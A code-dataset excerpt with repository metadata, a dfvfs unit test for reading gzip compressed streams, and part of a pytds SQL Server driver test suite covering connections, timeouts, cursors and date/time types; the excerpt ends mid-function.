"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "11531518"
},
{
"name": "Shell",
"bytes": "2226"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
"""Tests for gzip compressed stream file."""
# Note: do not rename file to gzip.py this can cause the exception:
# AttributeError: 'module' object has no attribute 'GzipFile'
# when using pip.
import os
import unittest
from dfvfs.lib import definitions
from dfvfs.lib import gzipfile
from dfvfs.path import factory as path_spec_factory
from dfvfs.resolver import resolver
from tests import test_lib as shared_test_lib
# TODO: add tests for _GzipDecompressorState
# TODO: add tests for GzipMember
class GzipCompressedStreamTest(shared_test_lib.BaseTestCase):
"""Tests a gzip compressed stream file-like object."""
def testOpenClose(self):
"""Test the Open and Close functions."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(len(test_file.members), 1)
finally:
test_file.close()
def testSeek(self):
"""Test the seek functionality."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
test_file.seek(177)
self.assertEqual(test_file.read(5), b'53:01')
self.assertEqual(test_file.get_offset(), 182)
test_file.seek(-10, os.SEEK_END)
self.assertEqual(test_file.read(5), b'times')
test_file.seek(2, os.SEEK_CUR)
self.assertEqual(test_file.read(2), b'--')
# Conforming to the POSIX seek the offset can exceed the file size
# but reading will result in no data being returned.
test_file.seek(2000, os.SEEK_SET)
self.assertEqual(test_file.get_offset(), 2000)
self.assertEqual(test_file.read(2), b'')
# Test with an invalid offset.
with self.assertRaises(IOError):
test_file.seek(-10, os.SEEK_SET)
# On error the offset should not change.
self.assertEqual(test_file.get_offset(), 2000)
# Test with an invalid whence.
with self.assertRaises(IOError):
test_file.seek(10, 5)
# On error the offset should not change.
self.assertEqual(test_file.get_offset(), 2000)
finally:
test_file.close()
def testRead(self):
"""Test the read functionality."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
test_file.seek(167, os.SEEK_SET)
self.assertEqual(test_file.get_offset(), 167)
expected_data = (
b'Jan 22 07:53:01 myhostname.myhost.com CRON[31051]: (root) CMD '
b'(touch /var/run/crond.somecheck)\n')
data = test_file.read(95)
self.assertEqual(data, expected_data)
self.assertEqual(test_file.get_offset(), 262)
finally:
test_file.close()
def testReadCorrupt(self):
"""Tests reading a file that is corrupt."""
# The corrupt gzip has no member footer.
test_path = self._GetTestFilePath(['corrupt1.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(test_file.uncompressed_data_size, 2994187)
finally:
test_file.close()
def testReadMultipleMembers(self):
"""Tests reading a file that contains multiple gzip members."""
test_path = self._GetTestFilePath(['fsevents_000000000000b208'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(len(test_file.members), 2)
file_start = test_file.read(4)
self.assertEqual(file_start, b'1SLD')
# Read the end of the second member
test_file.seek(506631 - 4)
file_end = test_file.read(4)
self.assertEqual(file_end, b'\x02\x00\x80\x00')
# Seek backwards, and read across a member boundary.
test_file.seek(28530)
self.assertEqual(test_file.read(6), b'OS\x00P\x07\x00')
# Read with a size greater than the file size.
test_file.seek(0)
data = test_file.read(size=506631 + 4)
self.assertEqual(len(data), 506631)
self.assertEqual(data[-4:], b'\x02\x00\x80\x00')
finally:
test_file.close()
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e7131c8157c0fbda94bfbaf7b4dea529",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 75,
"avg_line_length": 29.635359116022098,
"alnum_prop": 0.6793437733035048,
"repo_name": "joachimmetz/dfvfs",
"id": "d3649f5019a65ae81fec7855e341a3e8640abf07",
"size": "5410",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/lib/gzipfile.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
from __future__ import unicode_literals
import os
import random
import string
import codecs
from six import StringIO, BytesIO
import logging
import socket
from pytds.tds_types import TimeType, DateTime2Type, DateType, DateTimeOffsetType, BitType, TinyIntType, SmallIntType, \
IntType, BigIntType, RealType, FloatType, NVarCharType, VarBinaryType, SmallDateTimeType, DateTimeType, DecimalType, \
MoneyType, UniqueIdentifierType, VariantType, ImageType, VarBinaryMaxType, VarCharType, TextType, NTextType, \
NVarCharMaxType, VarCharMaxType, XmlType
try:
import unittest2 as unittest
except:
import unittest
import sys
from decimal import Decimal, getcontext
import logging
from time import sleep
from datetime import datetime, date, time
import uuid
import pytest
import pytds.tz
import pytds.login
import pytds.smp
tzoffset = pytds.tz.FixedOffsetTimezone
utc = pytds.tz.utc
import pytds.extensions
import six
from six.moves import xrange
from pytds import (
connect, ProgrammingError, TimeoutError, Time,
Error, IntegrityError, Timestamp, DataError, Date, Binary,
output, default,
STRING, BINARY, NUMBER, DATETIME, DECIMAL, INTEGER, REAL, XML)
from pytds.tds_types import (DateTimeSerializer, SmallMoneyType)
from pytds.tds_base import (
Column,
IS_TDS73_PLUS, IS_TDS71_PLUS,
)
import dbapi20
import pytds
import settings
logger = logging.getLogger(__name__)
LIVE_TEST = getattr(settings, 'LIVE_TEST', True)
def create_test_database():
if not LIVE_TEST:
return
logger.info('in setup class')
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['autocommit'] = True
with connect(**kwargs) as conn:
with conn.cursor() as cur:
try:
cur.execute('drop database [{0}]'.format(settings.DATABASE))
except:
logger.exception('Failed to drop database')
pass
try:
cur.execute('create database [{0}]'.format(settings.DATABASE))
except:
pass
try:
cur.execute('create schema myschema')
except:
pass
try:
cur.execute('create table myschema.bulk_insert_table(num int, data varchar(100))')
except:
pass
try:
cur.execute('''
create procedure testproc (@param int, @add int = 2, @outparam int output)
as
begin
set nocount on
--select @param
set @outparam = @param + @add
return @outparam
end
''')
except:
pass
create_test_database()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_timeout_with_mars():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['timeout'] = 1
kwargs['use_mars'] = True
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
cur = conn.cursor()
with pytest.raises(TimeoutError):
cur.execute("waitfor delay '00:00:05'")
cur.execute('select 1')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_no_mars_autocommit():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'timeout': 1,
'pooling': True,
'autocommit': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
# test execute scalar with empty response
cur.execute_scalar('declare @tbl table(f int); select * from @tbl')
cur.execute("print 'hello'")
messages = cur.messages
assert len(messages) == 1
assert len(messages[0]) == 2
# in following assert exception class does not have to be exactly as specified
assert messages[0][0] == pytds.OperationalError
assert messages[0][1].text == 'hello'
assert messages[0][1].line == 1
assert messages[0][1].severity == 0
assert messages[0][1].number == 0
assert messages[0][1].state == 1
assert 'hello' in messages[0][1].message
# test cursor usage after close, should raise exception
cur = conn.cursor()
cur.execute_scalar('select 1')
cur.close()
with pytest.raises(Error) as ex:
cur.execute('select 1')
assert 'Cursor is closed' in str(ex)
# calling get_proc_return_status on closed cursor works
# this test does not have to pass
assert cur.get_proc_return_status() is None
# calling rowcount on closed cursor works
# this test does not have to pass
assert cur.rowcount == -1
# calling description on closed cursor works
# this test does not have to pass
assert cur.description is None
# calling messages on closed cursor works
# this test does not have to pass
assert cur.messages is None
# calling description on closed cursor works
# this test does not have to pass
assert cur.native_description is None
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_timeout_no_mars():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'timeout': 1,
'pooling': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
with pytest.raises(TimeoutError):
cur.execute("waitfor delay '00:00:05'")
with conn.cursor() as cur:
cur.execute("select 1")
cur.fetchall()
# test cancelling
with conn.cursor() as cur:
cur.execute('select 1')
cur.cancel()
assert cur.fetchall() == []
cur.execute('select 2')
assert cur.fetchall() == [(2,)]
# test rollback
conn.rollback()
# test callproc on non-mars connection
with conn.cursor() as cur:
cur.callproc('sp_reset_connection')
with conn.cursor() as cur:
# test spid property on non-mars cursor
assert cur.spid is not None
# test tzinfo_factory property r/w
cur.tzinfo_factory = cur.tzinfo_factory
# test non-mars cursor with connection pool enabled
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
assert cur.fetchall() == [(1,)]
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_no_mars_no_pooling():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'pooling': False,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1")
assert cur.fetchall() == [(1,)]
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_row_strategies():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'row_strategy': pytds.list_row_strategy,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1")
assert cur.fetchall() == [[1]]
kwargs.update({
'row_strategy': pytds.namedtuple_row_strategy,
})
import collections
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1 as f")
assert cur.fetchall() == [collections.namedtuple('Row', ['f'])(1)]
kwargs.update({
'row_strategy': pytds.recordtype_row_strategy,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1 as e, 2 as f")
row, = cur.fetchall()
assert row.e == 1
assert row.f == 2
assert row[0] == 1
assert row[:] == (1, 2)
row[0] = 3
assert row[:] == (3, 2)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_get_instances():
if not hasattr(settings, 'BROWSER_ADDRESS'):
return unittest.skip('BROWSER_ADDRESS setting is not defined')
pytds.tds.tds7_get_instances(settings.BROWSER_ADDRESS)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class ConnectionTestCase(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def tearDown(self):
self.conn.close()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class NoMarsTestCase(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['use_mars'] = False
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def tearDown(self):
self.conn.close()
def test_commit(self):
cursor = self.conn.cursor()
cursor.execute('select 1')
cursor.fetchall()
self.conn.commit()
class TestCaseWithCursor(ConnectionTestCase):
def setUp(self):
super(TestCaseWithCursor, self).setUp()
self.cursor = self.conn.cursor()
#def test_mars_sessions_recycle_ids(self):
# if not self.conn.mars_enabled:
# self.skipTest('Only relevant to mars')
# for _ in xrange(2 ** 16 + 1):
# cur = self.conn.cursor()
# cur.close()
def test_parameters_ll(self):
_params_tests(self)
class TestVariant(ConnectionTestCase):
def _t(self, result, sql):
with self.conn.cursor() as cur:
cur.execute("select cast({0} as sql_variant)".format(sql))
val, = cur.fetchone()
self.assertEqual(result, val)
def test_new_datetime(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
import pytds.tz
self._t(datetime(2011, 2, 3, 10, 11, 12, 3000), "cast('2011-02-03T10:11:12.003000' as datetime2)")
self._t(time(10, 11, 12, 3000), "cast('10:11:12.003000' as time)")
self._t(date(2011, 2, 3), "cast('2011-02-03' as date)")
self._t(datetime(2011, 2, 3, 10, 11, 12, 3000, pytds.tz.FixedOffsetTimezone(3 * 60)), "cast('2011-02-03T10:11:12.003000+03:00' as datetimeoffset)")
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class BadConnection(unittest.TestCase):
def test_invalid_parameters(self):
with self.assertRaises(Error):
with connect(server=settings.HOST + 'bad', database='master', user='baduser', password=settings.PASSWORD, login_timeout=1) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
with self.assertRaises(Error):
with connect(server=settings.HOST, database='doesnotexist', user=settings.USER, password=settings.PASSWORD) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
with self.assertRaises(Error):
with connect(server=settings.HOST, database='master', user='baduser', password=None) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
def test_instance_and_port(self):
host = settings.HOST
if '\\' in host:
host, _ = host.split('\\')
with self.assertRaisesRegexp(ValueError, 'Both instance and port shouldn\'t be specified'):
with connect(server=host + '\\badinstancename', database='master', user=settings.USER, password=settings.PASSWORD, port=1212) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
def get_spid(conn):
with conn.cursor() as cur:
return cur.spid
def kill(conn, spid):
with conn.cursor() as cur:
cur.execute('kill {0}'.format(spid))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class ConnectionClosing(unittest.TestCase):
def test_open_close(self):
for x in xrange(3):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
connect(**kwargs).close()
def test_closing_after_closed_by_server(self):
"""
You should be able to call close on connection closed by server
"""
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['autocommit'] = True
with connect(**kwargs) as master_conn:
kwargs['autocommit'] = False
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
conn.commit()
kill(master_conn, get_spid(conn))
sleep(0.2)
conn.close()
def test_connection_closed_by_server(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
with connect(**kwargs) as master_conn:
master_conn.autocommit = True
with connect(**kwargs) as conn:
conn.autocommit = False
# test overall recovery
with conn.cursor() as cur:
cur.execute('select 1')
conn.commit()
kill(master_conn, get_spid(conn))
sleep(0.2)
cur.execute('select 1')
cur.fetchall()
kill(master_conn, get_spid(conn))
sleep(0.2)
with conn.cursor() as cur:
cur.execute('select 1')
# test cursor opening in a transaction, it should raise exception
# make transaction dirty
with conn.cursor() as cur:
cur.execute('select 1')
kill(master_conn, get_spid(conn))
sleep(0.2)
# it does not have to raise this specific exception
with pytest.raises(socket.error):
with conn.cursor() as cur:
cur.execute('select 1')
# test recovery on transaction
with conn.cursor() as cur:
cur.execute('create table ##testtable3 (fld int)')
kill(master_conn, get_spid(conn))
sleep(0.2)
with self.assertRaises(Exception):
cur.execute('select * from ##testtable2')
cur.fetchall()
conn.rollback()
cur.execute('select 1')
# test server closed connection on rollback
with conn.cursor() as cur:
cur.execute('select 1')
kill(master_conn, get_spid(conn))
sleep(0.2)
conn.rollback()
#with connect(server=settings.HOST, database='master', user=settings.USER, password=settings.PASSWORD) as conn:
# spid = get_spid(conn)
# with conn.cursor() as cur:
# # test recovery of specific lowlevel methods
# tds_submit_query(cur._session, "waitfor delay '00:00:05'; select 1")
# kill(master_conn, spid)
# self.assertTrue(cur._session.is_connected())
# with self.assertRaises(Exception):
# tds_process_tokens(cur._session, TDS_TOKEN_RESULTS)
# self.assertFalse(cur._session.is_connected())
#class EncryptionTest(unittest.TestCase):
# def runTest(self):
# conn = connect(server=settings.HOST, database='master', user=settings.USER, password=settings.PASSWORD, encryption_level=TDS_ENCRYPTION_REQUIRE)
# cur = conn.cursor()
# cur.execute('select 1')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class SmallDateTimeTest(ConnectionTestCase):
def _testval(self, val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as smalldatetime)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
def runTest(self):
self._testval(Timestamp(2010, 2, 1, 10, 12, 0))
self._testval(Timestamp(1900, 1, 1, 0, 0, 0))
self._testval(Timestamp(2079, 6, 6, 23, 59, 0))
with self.assertRaises(Error):
self._testval(Timestamp(1899, 1, 1, 0, 0, 0))
with self.assertRaises(Error):
self._testval(Timestamp(2080, 1, 1, 0, 0, 0))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class DateTimeTest(ConnectionTestCase):
def _testencdec(self, val):
self.assertEqual(val, DateTimeSerializer.decode(*DateTimeSerializer._struct.unpack(DateTimeSerializer.encode(val))))
def _testval(self, val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as datetime)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
def runTest(self):
with self.conn.cursor() as cur:
cur.execute("select cast('9999-12-31T23:59:59.997' as datetime)")
self.assertEqual(cur.fetchall(), [(Timestamp(9999, 12, 31, 23, 59, 59, 997000),)])
self._testencdec(Timestamp(2010, 1, 2, 10, 11, 12))
self._testval(Timestamp(2010, 1, 2, 0, 0, 0))
self._testval(Timestamp(2010, 1, 2, 10, 11, 12))
self._testval(Timestamp(1753, 1, 1, 0, 0, 0))
self._testval(Timestamp(9999, 12, 31, 0, 0, 0))
with self.conn.cursor() as cur:
cur.execute("select cast(null as datetime)")
self.assertEqual(cur.fetchall(), [(None,)])
self._testval(Timestamp(9999, 12, 31, 23, 59, 59, 997000))
with self.assertRaises(Error):
self._testval(Timestamp(1752, 1, 1, 0, 0, 0))
with self.conn.cursor() as cur:
cur.execute('''
if object_id('testtable') is not null
drop table testtable
''')
cur.execute('create table testtable (col datetime not null)')
dt = Timestamp(2010, 1, 2, 20, 21, 22, 123000)
cur.execute('insert into testtable values (%s)', (dt,))
cur.execute('select col from testtable')
self.assertEqual(cur.fetchone(), (dt,))
class NewDateTimeTest(ConnectionTestCase):
def test_datetimeoffset(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def _testval(val):
with self.conn.cursor() as cur:
import pytds.tz
cur.tzinfo_factory = pytds.tz.FixedOffsetTimezone
cur.execute('select cast(%s as datetimeoffset)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
with self.conn.cursor() as cur:
import pytds.tz
cur.tzinfo_factory = pytds.tz.FixedOffsetTimezone
cur.execute("select cast('2010-01-02T20:21:22.1234567+05:00' as datetimeoffset)")
self.assertEqual(datetime(2010, 1, 2, 20, 21, 22, 123456, tzoffset(5 * 60)), cur.fetchone()[0])
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, utc))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(5 * 60)))
_testval(Timestamp(1, 1, 1, 0, 0, 0, 0, utc))
_testval(Timestamp(9999, 12, 31, 23, 59, 59, 999999, utc))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(14)))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(-14)))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(-15)))
def test_time(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as time)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
testval(Time(14, 16, 18, 123456))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(23, 59, 59, 999999))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
def test_datetime2(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as datetime2)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
testval(Timestamp(2010, 1, 2, 20, 21, 22, 345678))
testval(Timestamp(2010, 1, 2, 0, 0, 0))
testval(Timestamp(1, 1, 1, 0, 0, 0))
testval(Timestamp(9999, 12, 31, 23, 59, 59, 999999))
def test_date(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as date)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
testval(Date(2010, 1, 2))
testval(Date(2010, 1, 2))
testval(Date(1, 1, 1))
testval(Date(9999, 12, 31))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class Auth(unittest.TestCase):
@unittest.skipUnless(os.getenv('NTLM_USER') and os.getenv('NTLM_PASSWORD'), "requires NTLM_USER and NTLM_PASSWORD environment variables to be set")
def test_ntlm(self):
conn = connect(settings.HOST, auth=pytds.login.NtlmAuth(user_name=os.getenv('NTLM_USER'), password=os.getenv('NTLM_PASSWORD')))
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_sspi(self):
from pytds.login import SspiAuth
with connect(settings.HOST, auth=SspiAuth()) as conn:
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
@unittest.skipIf(getattr(settings, 'SKIP_SQL_AUTH', False), 'SKIP_SQL_AUTH is set')
def test_sqlauth(self):
with connect(settings.HOST, user=settings.USER, password=settings.PASSWORD) as conn:
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
class CloseCursorTwice(ConnectionTestCase):
def runTest(self):
cursor = self.conn.cursor()
cursor.close()
cursor.close()
class RegressionSuite(ConnectionTestCase):
def test_cancel(self):
self.conn.cursor().cancel()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TimezoneTests(unittest.TestCase):
def check_val(self, conn, sql, input, output):
with conn.cursor() as cur:
cur.execute('select ' + sql, (input,))
rows = cur.fetchall()
self.assertEqual(rows[0][0], output)
def runTest(self):
kwargs = settings.CONNECT_KWARGS.copy()
use_tz = utc
kwargs['use_tz'] = use_tz
kwargs['database'] = 'master'
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
# Naive time should be interpreted as use_tz
self.check_val(conn, '%s',
datetime(2011, 2, 3, 10, 11, 12, 3000),
datetime(2011, 2, 3, 10, 11, 12, 3000, utc))
# Aware time shoule be passed as-is
dt = datetime(2011, 2, 3, 10, 11, 12, 3000, tzoffset(1))
self.check_val(conn, '%s', dt, dt)
# Aware time should be converted to use_tz if not using datetimeoffset type
dt = datetime(2011, 2, 3, 10, 11, 12, 3000, tzoffset(1))
if IS_TDS73_PLUS(conn):
self.check_val(conn, 'cast(%s as datetime2)', dt, dt.astimezone(use_tz))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class DbapiTestSuite(dbapi20.DatabaseAPI20Test, ConnectionTestCase):
driver = pytds
connect_args = settings.CONNECT_ARGS
connect_kw_args = settings.CONNECT_KWARGS
# def _connect(self):
# return connection
def _try_run(self, *args):
with self._connect() as con:
with con.cursor() as cur:
for arg in args:
cur.execute(arg)
def _try_run2(self, cur, *args):
for arg in args:
cur.execute(arg)
# This should create the "lower" sproc.
def _callproc_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[to_lower]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[to_lower]""",
"""
CREATE PROCEDURE to_lower
@input nvarchar(max)
AS
BEGIN
select LOWER(@input)
END
""",
)
# This should create a sproc with a return value.
def _retval_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one]""",
"""
CREATE PROCEDURE add_one (@input int)
AS
BEGIN
return @input+1
END
""",
)
def test_retval(self):
with self._connect() as con:
cur = con.cursor()
self._retval_setup(cur)
values = cur.callproc('add_one', (1,))
self.assertEqual(values[0], 1, 'input parameter should be left unchanged: %s' % (values[0],))
self.assertEqual(cur.description, None, "No resultset was expected.")
self.assertEqual(cur.return_value, 2, "Invalid return value: %s" % (cur.return_value,))
# This should create a sproc with a return value.
def _retval_select_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one_select]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one_select]""",
"""
CREATE PROCEDURE add_one_select (@input int)
AS
BEGIN
select 'a' as a
select 'b' as b
return @input+1
END
""",
)
def test_retval_select(self):
with self._connect() as con:
cur = con.cursor()
self._retval_select_setup(cur)
values = cur.callproc('add_one_select', (1,))
self.assertEqual(values[0], 1, 'input parameter should be left unchanged: %s' % (values[0],))
self.assertEqual(len(cur.description), 1, "Unexpected resultset.")
self.assertEqual(cur.description[0][0], 'a', "Unexpected resultset.")
self.assertEqual(cur.fetchall(), [('a',)], 'Unexpected resultset.')
self.assertTrue(cur.nextset(), 'No second resultset found.')
self.assertEqual(len(cur.description), 1, "Unexpected resultset.")
self.assertEqual(cur.description[0][0], 'b', "Unexpected resultset.")
self.assertEqual(cur.return_value, 2, "Invalid return value: %s" % (cur.return_value,))
with self.assertRaises(Error):
cur.fetchall()
# This should create a sproc with an output parameter.
def _outparam_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one_out]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one_out]""",
"""
CREATE PROCEDURE add_one_out (@input int, @output int OUTPUT)
AS
BEGIN
SET @output = @input+1
END
""",
)
def test_outparam(self):
with self._connect() as con:
cur = con.cursor()
self._outparam_setup(cur)
values = cur.callproc('add_one_out', (1, output(value=1)))
self.assertEqual(len(values), 2, 'expected 2 parameters')
self.assertEqual(values[0], 1, 'input parameter should be unchanged')
self.assertEqual(values[1], 2, 'output parameter should get new values')
values = cur.callproc('add_one_out', (None, output(value=1)))
self.assertEqual(len(values), 2, 'expected 2 parameters')
self.assertEqual(values[0], None, 'input parameter should be unchanged')
self.assertEqual(values[1], None, 'output parameter should get new values')
def test_assigning_select(self):
# test that assigning select does not interfere with result sets
with self._connect() as con:
cur = con.cursor()
cur.execute("""
declare @var1 int
select @var1 = 1
select @var1 = 2
select 'value'
""")
self.assertFalse(cur.description)
self.assertTrue(cur.nextset())
self.assertFalse(cur.description)
self.assertTrue(cur.nextset())
self.assertTrue(cur.description)
self.assertEqual([(u'value',)], cur.fetchall())
self.assertFalse(cur.nextset())
cur.execute("""
set nocount on
declare @var1 int
select @var1 = 1
select @var1 = 2
select 'value'
""")
self.assertTrue(cur.description)
self.assertEqual([(u'value',)], cur.fetchall())
self.assertFalse(cur.nextset())
# Don't need setoutputsize tests.
def test_setoutputsize(self):
pass
def help_nextset_setUp(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[deleteme]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[deleteme]""",
"""
create procedure deleteme
as
begin
select count(*) from %sbooze
select name from %sbooze
end
""" % (self.table_prefix, self.table_prefix),
)
def help_nextset_tearDown(self, cur):
cur.execute("drop procedure deleteme")
def test_ExceptionsAsConnectionAttributes(self):
pass
def test_select_decimal_zero(self):
with self._connect() as con:
expected = (
Decimal('0.00'),
Decimal('0.0'),
Decimal('-0.00'))
cur = con.cursor()
cur.execute("SELECT %s as A, %s as B, %s as C", expected)
result = cur.fetchall()
self.assertEqual(result[0], expected)
def test_type_objects(self):
with self._connect() as con:
cur = con.cursor()
cur.execute("""
select cast(0 as varchar),
cast(1 as binary),
cast(2 as int),
cast(3 as real),
cast(4 as decimal),
cast('2005' as datetime),
cast('6' as xml)
""")
self.assertTrue(cur.description)
col_types = [col[1] for col in cur.description]
self.assertEqual(col_types[0], STRING)
self.assertEqual(col_types[1], BINARY)
self.assertEqual(col_types[2], NUMBER)
self.assertEqual(col_types[2], INTEGER)
self.assertEqual(col_types[3], NUMBER)
self.assertEqual(col_types[3], REAL)
# self.assertEqual(col_types[4], NUMBER) ?
self.assertEqual(col_types[4], DECIMAL)
self.assertEqual(col_types[5], DATETIME)
self.assertEqual(col_types[6], XML)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestBug4(unittest.TestCase):
def test_as_dict(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
conn.as_dict = True
with conn.cursor() as cur:
cur.execute('select 1 as a, 2 as b')
self.assertDictEqual({'a': 1, 'b': 2}, cur.fetchone())
def _params_tests(self):
def test_val(typ, val):
with self.conn.cursor() as cur:
param = Column(type=typ, value=val)
logger.info("Testing with %s", repr(param))
cur.execute('select %s', [param])
self.assertTupleEqual(cur.fetchone(), (val,))
self.assertIs(cur.fetchone(), None)
test_val(BitType(), True)
test_val(BitType(), False)
test_val(BitType(), None)
test_val(TinyIntType(), 255)
